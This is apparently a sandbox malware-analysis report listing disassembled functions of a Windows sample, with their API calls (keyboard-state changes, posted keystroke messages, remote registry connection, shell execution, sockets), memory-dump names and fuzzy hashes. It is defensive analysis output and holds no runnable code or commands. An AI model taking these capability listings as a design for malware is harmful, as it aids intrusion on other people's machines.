                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013FDEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3479070676-0
                                                        • Opcode ID: 9ca8f6a6dbf0b2759fbc4a99ede17c3d6f13921e59f3b9afc20909d998841d25
                                                        • Instruction ID: 37746378dea052122317d6c5418af4ec21b293e8bfe14534b5ac42742f15dd9d
                                                        • Opcode Fuzzy Hash: 9ca8f6a6dbf0b2759fbc4a99ede17c3d6f13921e59f3b9afc20909d998841d25
                                                        • Instruction Fuzzy Hash: D7A16A716042019FCB14EF14C885FAEB7E5EF85314F14882DF9968B2A2DB31E94ACF52
                                                        Function 000C2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000), ref: 000C2ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 000C2B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000), ref: 000FC21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000), ref: 000FC286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 5d06083f15857bc744f178ccb6382c492cc35642b89e6535ff6ffaa787bbe3c9
                                                        • Instruction ID: 95d57bd5fd69dc9f926272bc3fb09e1ae46efe89d1143d6a3aa0002c80237c1c
                                                        • Opcode Fuzzy Hash: 5d06083f15857bc744f178ccb6382c492cc35642b89e6535ff6ffaa787bbe3c9
                                                        • Instruction Fuzzy Hash: FA4129306046849BD7B99B288D8CF7F7BD2FB46310F15881DE14782EB1C775A892E712
                                                        Function 001270C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 001270DD
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00127114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00127130
                                                        • _memmove.LIBCMT ref: 0012717E
                                                        • _memmove.LIBCMT ref: 0012719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 001271AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001271BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 001271DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 5d3e9835ce1f45decdaffb5deef5dc01f5c988e23ce466d721bc7cc90551dc73
                                                        • Instruction ID: 10ce120a8c79fed5bee389f2c3e2cebbb12a31914199676fa645a896792201c7
                                                        • Opcode Fuzzy Hash: 5d3e9835ce1f45decdaffb5deef5dc01f5c988e23ce466d721bc7cc90551dc73
                                                        • Instruction Fuzzy Hash: C2318D35900205EFCB00DFA5DC85AABB7B8EF45710F1440B9F904AB256DB70DEA1CBA0
                                                        Function 001461D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 001461EB
                                                        • GetDC.USER32(00000000), ref: 001461F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001461FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0014620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00146246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00146257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0014902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00146291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001462B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: a5b3efd7173740da5c2640cc17f685e71bb38b9e24e9e9c5c7b5d7ef3799f857
                                                        • Instruction ID: 1043c2f813eb74f02b4b539250ca07d9da1ceee40a72fa122d3abb3006d9c617
                                                        • Opcode Fuzzy Hash: a5b3efd7173740da5c2640cc17f685e71bb38b9e24e9e9c5c7b5d7ef3799f857
                                                        • Instruction Fuzzy Hash: 743141762012147FEB114F50CC8AFEB3BA9EF5A755F054065FE089A2A1C7B59C42CB64
                                                        Function 0011BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 01c9d53946fa585d075ec97038f89374f666d2710fd80d7f9376473993154fe3
                                                        • Instruction ID: d316c49db479af3a6bbc371b3d0e473f49b441f5b001f7c9769622218846b559
                                                        • Opcode Fuzzy Hash: 01c9d53946fa585d075ec97038f89374f666d2710fd80d7f9376473993154fe3
                                                        • Instruction Fuzzy Hash: 652192B2609209BBE60C66129DC2FFF735D9E11388F044034FD04AAA87EB75DE5581E6
                                                        Function 0012EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                        • _wcstok.LIBCMT ref: 0012EC94
                                                        • _wcscpy.LIBCMT ref: 0012ED23
                                                        • _memset.LIBCMT ref: 0012ED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 8dd2e5d40c97897af7054123480223385a1544b4064eca0412c2c0220fd96262
                                                        • Instruction ID: 4dcf74598dfb51aae89af55276be0a4f1c54a12d4fa47aeb0fd12071423d0489
                                                        • Opcode Fuzzy Hash: 8dd2e5d40c97897af7054123480223385a1544b4064eca0412c2c0220fd96262
                                                        • Instruction Fuzzy Hash: 1DC147716083519FC724EF64D985EAEB7E4EF85310F00492DF8999B2A2DB30EC55CB82
                                                        Function 00136B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00136C00
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00136C21
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00136C34
                                                        • htons.WSOCK32(?), ref: 00136CEA
                                                        • inet_ntoa.WSOCK32(?), ref: 00136CA7
                                                          • Part of subcall function 0011A7E9: _strlen.LIBCMT ref: 0011A7F3
                                                          • Part of subcall function 0011A7E9: _memmove.LIBCMT ref: 0011A815
                                                        • _strlen.LIBCMT ref: 00136D44
                                                        • _memmove.LIBCMT ref: 00136DAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 6f528788bfa6eed90e596174d15a9018f5e361398b04dea4bb27133693e74b9f
                                                        • Instruction ID: ed4069ebc1e9a68cf473b3107c2fdd7f8e6d5c3cb6ff5762c1d8623ce11b0515
                                                        • Opcode Fuzzy Hash: 6f528788bfa6eed90e596174d15a9018f5e361398b04dea4bb27133693e74b9f
                                                        • Instruction Fuzzy Hash: 1181CF71204200BBD714EB64CC86FAFB7A8AF94714F10892CF5959B2E2DB70ED41CB92
                                                        Function 000C1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 459e00363f213fb3684a3c8f823d4e9a7d7277d0cc9805fdb626ca7b233f3911
                                                        • Instruction ID: 67502e0b349b7d6d27b465fa9a4dd41c6d12899ca9fea13921b55a0d3c0364a8
                                                        • Opcode Fuzzy Hash: 459e00363f213fb3684a3c8f823d4e9a7d7277d0cc9805fdb626ca7b233f3911
                                                        • Instruction Fuzzy Hash: 88716B34904109EFCB149F98CC48EFEBBB9FF86314F148159F915AA252C734AA52DFA0
                                                        Function 0014B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(01444A18), ref: 0014B3EB
                                                        • IsWindowEnabled.USER32(01444A18), ref: 0014B3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0014B4DB
                                                        • SendMessageW.USER32(01444A18,000000B0,?,?), ref: 0014B512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0014B54F
                                                        • GetWindowLongW.USER32(01444A18,000000EC), ref: 0014B571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0014B589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID:
                                                        • API String ID: 4072528602-0
                                                        • Opcode ID: bc52d0f30be959f45b4c720863ae87409641d9cf427b74de70cd815cef501bda
                                                        • Instruction ID: 36d391201bb937955a6f2d30d0dbf1509581fba38de47c64a3d3795586b36f74
                                                        • Opcode Fuzzy Hash: bc52d0f30be959f45b4c720863ae87409641d9cf427b74de70cd815cef501bda
                                                        • Instruction Fuzzy Hash: 27717D34609204EFDB249F95C8D4FBABBB9FF1A300F184059EA46972B2C731E951CB51
                                                        Function 0013F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0013F448
                                                        • _memset.LIBCMT ref: 0013F511
                                                        • ShellExecuteExW.SHELL32(?), ref: 0013F556
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 0013F5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 0013F5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: 05d35bbf3398eb77c0dc4f7a25a3a6883de74543583e706dc589b1f9a786291f
                                                        • Instruction ID: 6920b7fed95ca01f7fba8cfb103949ac14e82530fe49d8f4297915e5ca7b649c
                                                        • Opcode Fuzzy Hash: 05d35bbf3398eb77c0dc4f7a25a3a6883de74543583e706dc589b1f9a786291f
                                                        • Instruction Fuzzy Hash: D5616D75E006199FCF14DF64C885AAEBBB5FF49710F14806DE856AB362CB30AD46CB90
                                                        Function 00120F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00120F8C
                                                        • GetKeyboardState.USER32(?), ref: 00120FA1
                                                        • SetKeyboardState.USER32(?), ref: 00121002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00121030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0012104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00121095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001210B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 77f5b7435083fbb58761206f852199e53e9362f983781415c93788ad4fedbc5d
                                                        • Instruction ID: fd7ae59825a78040ebc896a115f16c914b70d1815d396eca34922f37933d6512
                                                        • Opcode Fuzzy Hash: 77f5b7435083fbb58761206f852199e53e9362f983781415c93788ad4fedbc5d
                                                        • Instruction Fuzzy Hash: 6D51F5605447E53EFB3682349C05BBABEA95B16304F084589F1D4858D3D3E4ECE5D751
                                                        Function 00120D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00120DA5
                                                        • GetKeyboardState.USER32(?), ref: 00120DBA
                                                        • SetKeyboardState.USER32(?), ref: 00120E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00120E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00120E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00120EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00120EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: d67d6452c434e385b897a334af997b9c318a26bcabc3ff9719a06dab89fcddd8
                                                        • Instruction ID: 94b51d936aa1b7e81804c49ab2493d5693b6e2a2a4bfdd6dbece2820330825b2
                                                        • Opcode Fuzzy Hash: d67d6452c434e385b897a334af997b9c318a26bcabc3ff9719a06dab89fcddd8
                                                        • Instruction Fuzzy Hash: CF51E4A05446E57EFB3783649C45BBABFA95B0A300F088A8DF1D4468C3C395ACE8D760
                                                        Function 001255FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: a17ccd049b9646b5722e73e2c6f4d7e3d1c19eea7a962121f8027d620d618771
                                                        • Instruction ID: 36c400978e34aa426164d4132bcc4b02f568913c77231fa3d3b6127a1efb4636
                                                        • Opcode Fuzzy Hash: a17ccd049b9646b5722e73e2c6f4d7e3d1c19eea7a962121f8027d620d618771
                                                        • Instruction Fuzzy Hash: 0341D466C106547ACB11EBB59C8A9CFB7BC9F04310F508866E508F3222FB34E355C7AA
                                                        Function 00123671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00123697,?), ref: 0012468B
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00123697,?), ref: 001246A4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 001236B7
                                                        • _wcscmp.LIBCMT ref: 001236D3
                                                        • MoveFileW.KERNEL32(?,?), ref: 001236EB
                                                        • _wcscat.LIBCMT ref: 00123733
                                                        • SHFileOperationW.SHELL32(?), ref: 0012379F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: c258551e8b0a4e49b71fe8fa3c13dcec45e022dc79c4943fd37ad225d28509e2
                                                        • Instruction ID: 42060e4644de1217cb7ac6b636618d115d16f7709b6ad955003c795614e593f2
                                                        • Opcode Fuzzy Hash: c258551e8b0a4e49b71fe8fa3c13dcec45e022dc79c4943fd37ad225d28509e2
                                                        • Instruction Fuzzy Hash: C8418171508354AEC756EF64D8419DF77ECAF89380F50082EB49AC3251EB38D799C752
                                                        Function 00147291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 001472AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00147351
                                                        • IsMenu.USER32(?), ref: 00147369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001473B1
                                                        • DrawMenuBar.USER32 ref: 001473C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: b19a24f4f31359292ed5d01fba05968ff308749579b923cb271ed4c05e5bc265
                                                        • Instruction ID: a82cc0ca500d15a4fb2a75e0a3bcf42b366451f76e867aba929a434d47e199ee
                                                        • Opcode Fuzzy Hash: b19a24f4f31359292ed5d01fba05968ff308749579b923cb271ed4c05e5bc265
                                                        • Instruction Fuzzy Hash: 1D410575A04209EFDB20DF61D884EAABBF9FB09350F148529FD55AB2A0D730AD50DF60
